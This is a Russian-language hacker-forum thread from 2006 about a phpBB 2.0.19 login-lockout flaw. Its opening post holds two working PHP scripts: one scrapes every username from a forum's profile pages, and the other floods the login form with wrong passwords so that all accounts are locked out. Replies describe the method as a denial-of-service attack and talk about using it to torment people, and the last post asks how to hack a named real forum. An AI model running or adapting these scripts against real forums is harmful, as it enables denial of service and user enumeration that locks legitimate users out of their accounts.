Форумы Уязвимость в phpbb 2.0.19 возможно даже более ранние версии

Discussion in 'Уязвимости CMS/форумов' started by k1b0rg, 11 Feb 2006.

  1. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
    Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

    Эксплоит (написан на php)

    Собирает в файл Ники всех пользователей форума.
    ---------------
    Автор: k1b0rg
    ---------------​
    Code:
    <?
    $host="Сайт";
    $papka="Папка с форумом";
    $port=80;
    $number_users=2050;
    $start=1;
    set_time_limit(0);
    $file="user.txt";
    $file=fopen($file,*w*);
    for($i=$start;$i<=$number_users;$i++)
    {$request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n";
    $request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n";
    $request.="Accept-Language: ru\r\n";
    $request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $request.="Host: $host\r\n";
    $request.="Proxy-Connection: Keep-Alive\r\n\r\n";
    $sock=fsockopen("$host",$port,$errno,$errstr);
    fputs($sock,$request);
    while(!feof($sock))
    {$str=fgets($sock);
    if(preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
    {if(trim($return[1])!=**)
    {fputs($file,"$return[1]\n");
    }}}}
    fclose($file);
    fclose($sock);
    ?>
    Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:
    1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
    2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
    в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле <title>Юзер - Lamer</title>
    то переписываем preg_match как
    preg_match("/<title>Юзер - (.*)<\/title>/i",$str,$return))
    Сам сплоит
    ---------------
    Автор: ASSCOL
    ---------------​
    Code:
    <?
    set_time_limit(0);
    $host="Сайт";
    $papka="Папка с форумом";
    $file=fopen("user.txt",*r*);
    while(!feof($file))
    {
    $str=fgets($file);
    $str=trim($str);
    for($i=0; $i<=5; $i++)
    {
    $request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n";
    $request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n";
    $request.="Referer: http://$host/$papka/login.php\r\n";
    $request.="Accept-Language: ru\r\n";
    $request.="Content-Type: application/x-www-form-urlencoded\r\n";
    $request.="Proxy-Connection: Keep-Alive\r\n";
    $request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n";
    $request.="Host: $host\r\n";
    $request.="Content-Length: 73\r\n";
    $request.="Pragma: no-cache\r\n";
    $request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n";
    $request.="\r\n";
    $request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n";
    $fp=fsockopen("$host",80,$errstr,$errno);
    fputs($fp,$request);
    fclose($fp); 
    }
    }
    ?>
    --------------------------------
    Нашел уязвимость ASSCOL.
    --------------------------------​
    Статья взята с сайта http://comp-info.ru
     
    4 people like this.
  2. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    как могут быть уязвимы более ранние версии, если эта функция включена тока в 19-ую сборку
     
    1 person likes this.
  3. gazta

    gazta Elder - Старейшина

    Joined:
    16 Oct 2005
    Messages:
    35
    Likes Received:
    3
    Reputations:
    -1
    А с никами что потом делать?
     
  4. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    берешь первый скрипт, он вытягивает все ники с форума ,а потом их записываешь в файл user.txt и запускаешь второй сплойт
     
  5. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    457
    Likes Received:
    212
    Reputations:
    168
    Вешь прикольная, но смысла с нее помоему маловато =)
    Разве что насолить плотно кому-то =)
    Ох счас поиздеваюсь =)
    Спасибо k1b0rg =)
     
  6. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    тот же DoS только изощренная форма
     
  7. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    760
    Likes Received:
    216
    Reputations:
    257
    Байан, никакой не АССОЛ это нашел) Об этом писали еще как тока эта фича вообще появилась
     
  8. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    2Zadoxlik
    дай сцылку где писали
     
  9. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    760
    Likes Received:
    216
    Reputations:
    257
    Я щас не помню уже. по-мойму на myphpbb.com.ru или где-то в обсуждении короче этой версии. Речь зашла об этой блокировке и кто-то предположил что так можно банить, что собственно само собой разумеется.
    Вообще непонятно, о чем девелоперы думают... Там по-мойму был какой-то патч, убирающий эту фигню
     
  10. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Ну а если человек ее сам нушол этот глюк, тогда что?
    авторство сохранено, и удали плиз наши мессаги, чтобы во флуд не переросла тема
     
  11. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Да так поиздеваться прикольно было бы.
     
  12. M'sha

    M'sha New Member

    Joined:
    24 Mar 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    -1
    Слушайте. Помогите узнать версию PHPBB форума: http://forum.tikhvin.info
    И если кто знает как его мона хакнуть?
     
Loading...